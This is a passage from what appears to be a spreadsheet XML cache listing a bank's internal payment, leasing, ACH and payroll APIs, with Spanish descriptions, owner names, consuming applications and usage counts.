    <s v="API ONPREMISE"/>
    <d v="2021-08-17T19:23:24"/>
    <s v="Payment Leasing"/>
    <n v="130"/>
    <s v="Payment Leasing - Information"/>
    <n v="130"/>
    <x v="313"/>
    <s v="La API Payment Leasing - Information permitirá a los consumidores realizar la consulta de los Planes de pagos de una operación especí­fica y obtener la información correspondiente del pago al dí­a de hoy, próximo pago  a vencerse o los pagos vencidos asociados a una obligación de Leasing (Financiero, Arrendamiento Operativo u otro)."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v=""/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <n v="14994"/>
    <n v="12006"/>
    <n v="10892"/>
    <n v="12934"/>
    <n v="14285"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-24T18:15:08"/>
    <s v="Payment Leasing"/>
    <n v="130"/>
    <s v="Payment Leasing - Payment Management"/>
    <n v="100"/>
    <x v="314"/>
    <s v="Este servicio permite realizar la gestión de un pago de Leasing , la aplicación de un pago y la gestión de transacción necesaria para un pago."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <m/>
    <m/>
    <m/>
    <n v="16"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-24T18:15:08"/>
    <s v="Payment Leasing"/>
    <n v="130"/>
    <s v="Payment Leasing - Payment Transaction Leasing"/>
    <n v="100"/>
    <x v="315"/>
    <s v="Este servicio permite realizar la gestión de transacción de un pago completo, desde el débito de una cuenta Banco de un cliente, anulación y aplicación de pagos en el core de Delfin."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-24T18:15:08"/>
    <s v="Payment Leasing"/>
    <n v="130"/>
    <s v="Payment Leasing - Retrieve Payments Condition"/>
    <n v="100"/>
    <x v="316"/>
    <s v="Esta API cuenta con la consulta de condiciones de pago en una operación leasing"/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ TransaccionPago_AW0360006 _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ Monitoreo_Payment_Leasing _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <m/>
    <m/>
    <m/>
    <n v="22"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-17T10:52:11"/>
    <s v="Payment Order"/>
    <n v="100"/>
    <s v="Payment Order - Payment file"/>
    <n v="100"/>
    <x v="317"/>
    <s v="El API Payment Order - Payment file tiene el objetivo de realizar la notificación al proveedor pagos, para informarle que tiene un archivo de lotes en una ruta Ifs, para que él la pueda tomar y posteriormente puede realizar la ejecución del archivo en lote."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Horus_AW1258011"/>
    <n v="828"/>
    <n v="965"/>
    <n v="956"/>
    <n v="994"/>
    <n v="1178"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-17T20:48:51"/>
    <s v="Payment Request"/>
    <n v="120"/>
    <s v="Payment Request - Batch Information"/>
    <n v="101"/>
    <x v="318"/>
    <s v="El API Payment Request - Batch information permitirá conocer la información de los lotes cargados por un cliente pagado, con diferentes opciones de filtro que facilitan la busqueda."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="ConsultaLotesDePago/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ SVE_NU0153001 _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR _x000d__x000a_ Pruebajason _x000d__x000a_ Horus_AW1258011"/>
    <m/>
    <n v="6"/>
    <m/>
    <n v="11"/>
    <n v="7"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-11-22T18:29:48"/>
    <s v="Payment Request"/>
    <n v="120"/>
    <s v="Payment Request - Management"/>
    <n v="101"/>
    <x v="319"/>
    <s v="El API Payment Request - Management permitirá realizar la gestión de los pagos al momento de su creación y posterior al pago, realizar acciones como anulaciones o reaplicación de pagos que tuvieron inconvenientes en el proceso. Tambien permitira procesar dispersion de pagos (Procesamiento de lotes de pago)"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="GestionDePagos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ SVE_NU0153001 _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR _x000d__x000a_ Pruebajason _x000d__x000a_ Horus_AW1258011"/>
    <n v="14"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-07-07T18:26:17"/>
    <s v="Payment Request"/>
    <n v="120"/>
    <s v="Payment Request - Payments Information"/>
    <n v="100"/>
    <x v="320"/>
    <s v="Este Produto API permite realizar la consulta de todos los pagos en el sistema de pagos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="ConsultaDePagos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ SVE_NU0153001 _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR _x000d__x000a_ Pruebajason _x000d__x000a_ Horus_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-30T18:10:13"/>
    <s v="payment_Initiation"/>
    <n v="100"/>
    <s v="Payments - QR Codes Management"/>
    <n v="200"/>
    <x v="321"/>
    <s v="El api Payments - QR Codes Management permite generar un código QR (código, no imagen) que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P). Adicionalmente se puede consultar la información de los QR generados por un comercio y la información de un QR en especí­fico.  El proveedor de este servicio es Todo1."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-02T22:29:54"/>
    <s v="Payments"/>
    <n v="230"/>
    <s v="Payments - QR Management"/>
    <n v="211"/>
    <x v="322"/>
    <s v="El api Payments - QR Management permite generar un QR que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P), dando la opción de generar una notificación adicional al momento del pago (diferente a las notificaciones por defecto de Aletas y Notificaciones). Adicionalmente permite solicita el enví­o fí­sico de un QR (en hablador), consultar la información de los QR generados por un comercio y la información de un QR en especí­fico."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v=""/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Gestiona_AW1302001 _x000d__x000a_ Nequi_AW1011 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ Payments_AW0012345 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="2397083"/>
    <n v="2134619"/>
    <n v="2295891"/>
    <n v="2492574"/>
    <n v="3209852"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-02T22:29:54"/>
    <s v="Payments"/>
    <n v="230"/>
    <s v="Payments - QR Payment"/>
    <n v="113"/>
    <x v="323"/>
    <s v="No tiene Descipcion"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Gestiona_AW1302001 _x000d__x000a_ Nequi_AW1011 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ Payments_AW0012345 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="1463983"/>
    <n v="1734292"/>
    <n v="1909018"/>
    <n v="2036438"/>
    <n v="2549187"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-02T22:29:54"/>
    <s v="Payments"/>
    <n v="230"/>
    <s v="Payments - Transaction Logs Management"/>
    <n v="208"/>
    <x v="324"/>
    <s v="El api Payments - Transaction Logs Management permite grabar y consultar la información relacionada con las transacciones realizadas por los clientes en los diferentes servicios de aceptación de medios de pago."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v=""/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Gestiona_AW1302001 _x000d__x000a_ Nequi_AW1011 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ Payments_AW0012345 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="10150"/>
    <n v="9127"/>
    <n v="7619"/>
    <n v="16554"/>
    <n v="24847"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-02T22:29:54"/>
    <s v="Payments"/>
    <n v="230"/>
    <s v="Payments - Transfer"/>
    <n v="100"/>
    <x v="325"/>
    <s v="Payments - Transfer, permite realizar una transferencia entre cuentas o la anulación de la misma, dicha transferencia se comporta como un pago, tiene en cuenta temas como comisiones, reporterí­a, balance, información de la venta, y del producto"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="GestionaNegocios_AW1302001 _x000d__x000a_ GestorCanal_NU0014001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ Gestiona_AW1302001 _x000d__x000a_ Nequi_AW1011 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ One Click Payment_NU0199001 _x000d__x000a_ Payments_AW0012345 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <m/>
    <m/>
    <m/>
    <n v="167"/>
    <n v="24904"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-11T17:01:57"/>
    <s v="Payments ACH Fulfillment"/>
    <n v="201"/>
    <s v="Payments ACH Fulfillment - Customer Enrollment"/>
    <n v="201"/>
    <x v="326"/>
    <s v="El API permite vincultar y desvincular las cuentas activas de ahorro y corriente del cliente Bancolombia con el níºmero de celular para realizar las transferencias Inmediatas en ACH en Lí­nea. Tambien permite consultar las cuentas vinculadas de un cliente con un numero de celular."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-11T17:01:57"/>
    <s v="Payments ACH Fulfillment"/>
    <n v="201"/>
    <s v="Payments ACH Fulfillment - Transfer Management"/>
    <n v="201"/>
    <x v="327"/>
    <s v="El API permite realizar las siguientes operaciones de (Envió, recibo y solicitud dinero) de forma inmediata para realizar transferencias en lí­nea a cuentas Bancolombia y otros bancos"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Transferencias y Recargas"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <n v="722"/>
    <n v="303"/>
    <n v="317"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-02-25T16:33:28"/>
    <s v="Employee Payroll"/>
    <n v="100"/>
    <s v="Payroll - Customer"/>
    <n v="100"/>
    <x v="328"/>
    <s v="La Api Employee payroll - Payroll customer permite a las pequeí±as y grandes empresas, realizar su inscripción de cliente (persona natural o jurí­dica) al servicio de pago de nómina. Lo anterior con el fin de tener el registro de dicho cliente en el sistema de pagos para que posteriormente el cliente pueda realizar el pago de su nómina. Este servicio también permite consultar si el cliente se encuentra registrado en pago de nómina."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ JornadaDepositos_NU0170001"/>
    <n v="19235"/>
    <n v="18368"/>
    <n v="16361"/>
    <n v="17012"/>
    <n v="18560"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-07-06T11:29:41"/>
    <s v="Payroll Agreement"/>
    <n v="100"/>
    <s v="Payroll Agreement - Information"/>
    <n v="100"/>
    <x v="329"/>
    <s v="El API Payroll Agreement - Information permitirá listar la información de los convenios de nómina a partir del empleador, pagador o beneficiario. Como resultado de la consulta se obtendrá información del plan, estado grupo y porcentaje de cobro que asume el empleador en la cuota de manejo "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ JornadaDepositos_NU0170001"/>
    <m/>
    <n v="7573"/>
    <n v="1404"/>
    <n v="4531"/>
    <n v="19991"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-28T18:18:38"/>
    <s v="Payroll And Supplier Payment"/>
    <n v="101"/>
    <s v="Payroll And Supplier Payment - Payers"/>
    <n v="101"/>
    <x v="330"/>
    <s v="El Payroll And Supplier Payment - Payers permite realizar la gestión con la información de los clientes pagadores"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="GestionClientePagador/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ pruebacaida _x000d__x000a_ Pruebajason _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="22"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-06-28T18:18:38"/>
    <s v="Payroll And Supplier Payment"/>
    <n v="101"/>
    <s v="Payroll And Supplier Payment-Beneficiaries"/>
    <n v="110"/>
    <x v="331"/>
    <s v="El API Payroll and Supplier Payment - Beneficieries permitirá realizar la gestión sobre los beneficiarios de los pagadores, podrán realizar procesos de inscripción de beneficiarios y consultas, pueden ser beneficiario con cuenta en el banco u otras entidades, para pagos por lotes. Esté aplica para los recaudadores que prefieren por seguridad realizar pagos a beneficiarios ya inscritos, en caso de no estar inscrito el pago se rechazará"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <s v="GestionBeneficiario/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ pruebacaida _x000d__x000a_ Pruebajason _x000d__x000a_ APIJ_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <n v="5"/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-06-03T15:33:34"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Companies"/>
    <n v="104"/>
    <x v="332"/>
    <s v="API que permite la gestión de las empresas en el producto de gestion nomina. Inicialmente las empresas se podran consultar y actualizar. La creación de esta entidad se realiza automaticamente con el API de enrolamiento al producto."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="178"/>
    <n v="181"/>
    <n v="1721"/>
    <n v="3182"/>
    <n v="4031"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Contracts and wages of employees"/>
    <n v="102"/>
    <x v="333"/>
    <s v="Gestión de contratos y salarios de los empleados de la empresa, con esta API se pueden crear, consultar, modificar y eliminar contratos y salarios de empleados en el producto de gestión de nómina, los empleados están relacionados con una empresa, uno o varios contratos y salarios."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="3"/>
    <n v="8"/>
    <n v="899"/>
    <n v="1514"/>
    <n v="2345"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Contracts settlement"/>
    <n v="102"/>
    <x v="334"/>
    <s v="Gestión de liquidación definitiva de contratos de empleados, la liquidación consiste en terminar la relación laboral con un empleado, esto solo aplica para  EMPLEADOS y PENSIONADOS, los otros contratos se pueden terminar pero las personas no son liquidadas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="3"/>
    <m/>
    <n v="874"/>
    <n v="1440"/>
    <n v="2305"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-02-28T16:58:49"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Customers enrollment"/>
    <n v="102"/>
    <x v="335"/>
    <s v="Gestión de enrolamiento de clientes, con esta API se puede enrolar un cliente(pyme, empresa...) al procduto de gestion de nominas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="3"/>
    <n v="1"/>
    <n v="886"/>
    <n v="1457"/>
    <n v="1519"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Employees"/>
    <n v="102"/>
    <x v="336"/>
    <s v="Gestión de los empleados de la empresa, con esta API se pueden crear, consultar, modificar y eliminar empleados de una empresa en el producto de gestion de nomina, los empleados estan relacionados con una empresa, uno o varios contratos y salarios."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="49"/>
    <n v="62"/>
    <n v="1144"/>
    <n v="2098"/>
    <n v="2827"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Locations"/>
    <n v="103"/>
    <x v="337"/>
    <s v="Gestión de las sedes de la empresa, con esta API se pueden crear, consultar, modificar y eliminar sedes de una empresa en el producto de gestion de nomina."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="29"/>
    <n v="21"/>
    <n v="1002"/>
    <n v="1787"/>
    <n v="2531"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-02-28T16:58:49"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Payroll concepts"/>
    <n v="101"/>
    <x v="338"/>
    <s v="Permite la gestión de los conceptos de nómina, estos son los diferentes conceptos que se usan para agregar novedades a la nómina e identificar los diferentes valores que corresponden. Estos pueden ser generales a nivel nacional que aplican para todas las empresas como salud, pensión, etc. y hay otros que pueden ser creados por las empresas de manera especí­fica. Inicialmente solo se podrán consultar los conceptos de nómina generales a nivel nacional pero posteriormente podrí­a implementarse gestion de conceptos especí­ficos para cada empresa."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="7"/>
    <n v="8"/>
    <n v="932"/>
    <n v="1490"/>
    <n v="2344"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Payroll novelties management"/>
    <n v="102"/>
    <x v="339"/>
    <s v="Gestión de las novedades de nómina de una empresa, con esta API se pueden crear, consultar y modificar elementos de nómina diferentes tipos. Los elementos de nómina son los que permiten agregar novedades salariales, no salariales o deducciones a una nómina y están directamente relacionados a un concepto de nómina, estas pueden ser recurrentes, es decir de ejecución periódico o aplicables a una nómina especifica de un periodo."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="12"/>
    <n v="34"/>
    <n v="917"/>
    <n v="1633"/>
    <n v="2474"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-02-28T16:58:49"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Payrolls"/>
    <n v="101"/>
    <x v="340"/>
    <s v="Permite la consulta y actualización de la nomina especifica de un empleado, en la nómina esta toda la información de lo pagado al empleado, sus deducciones, retenciones, aportes a seguridad social entre otros. Inicialmente solos se habilita el metodo para consulta de colilla de pago pero posteriormente se habilitarán los demas metodos de consulta y modificación."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <n v="4"/>
    <n v="880"/>
    <n v="1444"/>
    <n v="1509"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-02-28T16:58:49"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Periods"/>
    <n v="101"/>
    <x v="341"/>
    <s v="Permite la consulta de los perí­odos de liquidación de la nómina de una empresa, los perí­odos hacen referencia al tiempo en el cual se liquida la nómina de la empresa, estos pueden ser quincenales o mensuales dependiendo de la configuración de la empresa. Los endpoints de perí­odo permiten consultar el listado de los perí­odos de la empresa o consultar la información especí­fica de cada uno."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
